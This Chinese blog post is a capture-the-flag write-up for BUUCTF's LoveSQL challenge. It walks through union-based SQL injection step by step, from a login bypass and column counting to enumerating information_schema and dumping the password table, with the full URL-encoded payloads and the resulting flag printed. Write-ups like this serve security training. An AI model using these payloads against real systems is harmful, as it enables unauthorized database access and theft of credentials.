[极客大挑战 2019]LoveSQL 1

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


题目

BUUCTF的[极客大挑战 2019]LoveSQL 1
在这里插入图片描述


一、做题步骤

1.万能密码尝试

直接输入万能密码,能成功登录,但是找到的password并不是flag
在这里插入图片描述

2.测试注入列数

1.经过测试,需要用%27替代’ ;%23替代#
2.注入列数为4会报错

1%27order by 4 %23

在这里插入图片描述3.注入列数为3

1%27order by 3 %23

在这里插入图片描述

3.测试注入点

1%27union select 1,2,3 %23

2,3皆为注入点
在这里插入图片描述

4.查询数据库

①将命令放在注入点2中,但是会造成字符重叠,因此后续操作将命令放在注入点3中

1%27union select 1,group_concat(schema_name),3 from
information_schema.schemata %23

②将命令放在注入点3中

1%27union select 1,2,group_concat(schema_name) from
information_schema.schemata %23

在这里插入图片描述

5.查询表名

1%27union select 1,2,group_concat(table_name) from
information_schema.tables where table_schema=‘geek’%23

在这里插入图片描述

6.查询列名/字段

1%27union select 1,2,group_concat(column_name) from
information_schema.columns where table_name=‘l0ve1ysq1’%23

在这里插入图片描述

7.查询数据

1%27union select 1,2,group_concat(password) from geek.l0ve1ysq1%23

得到flag{9481e0dd-7372-413c-b58b-1c6a3af6468a}
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值